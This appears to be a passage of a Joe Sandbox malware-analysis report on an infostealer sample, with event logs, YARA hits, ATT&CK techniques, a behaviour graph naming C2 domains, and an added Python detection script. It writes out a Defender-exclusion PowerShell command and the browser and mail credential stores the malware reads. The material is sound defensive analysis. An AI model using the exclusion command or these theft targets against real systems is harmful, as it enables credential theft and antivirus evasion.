                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

Source: Yara match | File source: 5.2.ungziped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.ungziped_file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3512178205.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1400004101.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3512080555.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\SndVol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SndVol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\SndVol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SndVol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\SndVol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SndVol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\SndVol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\SndVol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SndVol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
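The process-creation, section-mapping, file-open and registry lines in this report are the raw material for host detections. What follows is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: a small Python pass that parses lines in the report's own "Source: <process><Event>: <detail>" shape (it also accepts a " | " between process and event) and flags the behaviours this report records: the Add-MpPreference -ExclusionPath call, SndVol.exe being launched from a non-Windows path and itself launching a browser, a section mapped execute+write into another process, and browser credential stores or the Outlook profile key opened by a process that is not the owning application. The sample lines are constructed to mirror lines on this page; the rule names, the set of watched system binaries and the browser-image allow list are this example's own assumptions, not report content.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample, modelled on the "Source: ..." lines of this report
# (the raw report runs the process path straight into the event name).
# The last line is a benign control: the browser reading its own store.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeProcess created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"
Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
"""

# Lazy <source> stops at the first event keyword, so the fused form parses;
# the optional " | " accepts a separated form as well.
EVENT_RE = re.compile(
    r"^Source: (?P<source>.+?)(?: \| )?"
    r"(?P<event>Process created|File opened|Key opened|Section loaded)"
    r": (?P<detail>.*)$"
)
BROWSER_STORE_RE = re.compile(
    r"\\(google\\chrome|microsoft\\edge)\\user data\\.*\\"
    r"(login data|cookies|web data|local state)$", re.I)
SECTION_RE = re.compile(r"NULL target: (?P<target>.+?) protection: (?P<prot>.+)$")

# Assumptions of this example: processes allowed to read browser stores, and
# system binaries that should neither be spawned from outside C:\Windows nor
# spawn children of their own.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}
WATCHED_SYSTEM_BINARIES = {"sndvol.exe"}


def basename(path):
    return PureWindowsPath(path).name.lower()


def parse(line):
    """Return {source, event, detail} for one report line, or None."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse(log_text):
    """Run the rules over every line; return (rule, source, object) findings."""
    findings = []
    for raw in log_text.splitlines():
        ev = parse(raw)
        if not ev:
            continue
        src, event, detail = ev["source"], ev["event"], ev["detail"]
        src_name = basename(src)
        if event == "Process created":
            image = detail.split(' "', 1)[0]          # image path precedes the quoted command line
            low = detail.lower()
            if "add-mppreference" in low and "-exclusionpath" in low:
                findings.append(("defender_exclusion_added", src, detail))
            if basename(image) in WATCHED_SYSTEM_BINARIES and not src.lower().startswith("c:\\windows\\"):
                findings.append(("system_binary_spawned_by_non_windows_parent", src, image))
            if src_name in WATCHED_SYSTEM_BINARIES:
                findings.append(("unexpected_child_of_system_binary", src, image))
        elif event == "Section loaded":
            m = SECTION_RE.match(detail)
            if m and m["target"] != src and "execute" in m["prot"] and "write" in m["prot"]:
                findings.append(("cross_process_rwx_section", src, m["target"]))
        elif event == "File opened":
            if BROWSER_STORE_RE.search(detail) and src_name not in BROWSER_IMAGES:
                findings.append(("browser_credential_store_read", src, detail))
        elif event == "Key opened":
            if "windows messaging subsystem\\profiles" in detail.lower() and src_name != "outlook.exe":
                findings.append(("mail_profile_registry_read", src, detail))
    return findings


def summarize(findings):
    """Count findings per rule name."""
    return Counter(f[0] for f in findings)


if __name__ == "__main__":
    for rule, source, obj in analyse(SAMPLE_LOG):
        print(f"{rule:45} {basename(source):20} {obj}")
```

Run on the sample it reports seven findings: one Defender exclusion, SndVol.exe started from the Program Files (x86) drop directory, SndVol.exe starting firefox.exe, the execute+write section mapped from ungziped_file.exe into SndVol.exe, two browser-store reads by SndVol.exe and the Outlook profile key read; the control line for chrome.exe reading its own Login Data is not flagged. The read-write-only section mapped into firefox.exe is deliberately left out of the RWX rule so the example shows where the line is drawn.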

                Remote Access Functionality

Source: Yara match | File source: 5.2.ungziped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.ungziped_file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3512178205.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1400004101.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3512080555.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques flagged by this analysis, by tactic. The number in parentheses is the figure the report's matrix shows in front of the technique; matrix cells without such a number are the unmatched default entries of the matrix and are omitted here.

Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (312); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (11); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (51); Process Injection (312); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1)
Discovery: Security Software Discovery (131); Process Discovery (2); Virtualization/Sandbox Evasion (51); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (123)
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4)

No techniques are flagged under Reconnaissance, Resource Development, Initial Access, Execution, Lateral Movement, Exfiltration or Impact.

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph (ID: 1633496; sample: ungziped_file.exe; start date: 10/03/2025; architecture: WINDOWS; score: 100)

Network endpoints attached to the root node: www.ticquan.xyz, www.matindi.xyz and 15 other IPs or domains. Signatures at the root: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 5 other signatures. "Performs DNS queries to domains with low reputation" is attached to www.matindi.xyz.

Process tree as drawn in the graph ("started" is a process launched by its parent node; "injected" is the graph's label for a process the parent node wrote code into):

ungziped_file.exe (started) - dropped file: C:\Users\user\...\ungziped_file.exe.log, ASCII; signature: Adds a directory exclusion to Windows Defender
    ungziped_file.exe (started) - signature: Maps a DLL or memory area into another process
        K1A8707LwM6.exe (injected) - signature: Found direct / indirect Syscall (likely to bypass EDR)
            SndVol.exe (started) - signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                K1A8707LwM6.exe (injected) - network: an05-prod-x.cdn-ng.net 103.42.144.142, ports 49705, 49706, 49707 (WSN-TW-NET-ASWorldstarNetworkTW, Taiwan; Republic of China (ROC)); www.gnlokn.info 47.83.1.90, ports 49735, 49736, 49737 (VODANETInternationalIP-BackboneofVodafoneDE, United States); 9 other IPs or domains; signature: Found direct / indirect Syscall (likely to bypass EDR)
                firefox.exe (started)
    powershell.exe (started) - signature: Loading BitLocker PowerShell Module
        WmiPrvSE.exe (started)
        conhost.exe (started)
    ungziped_file.exe (started)
svchost.exe (started) - network: 127.0.0.1 (unknown)
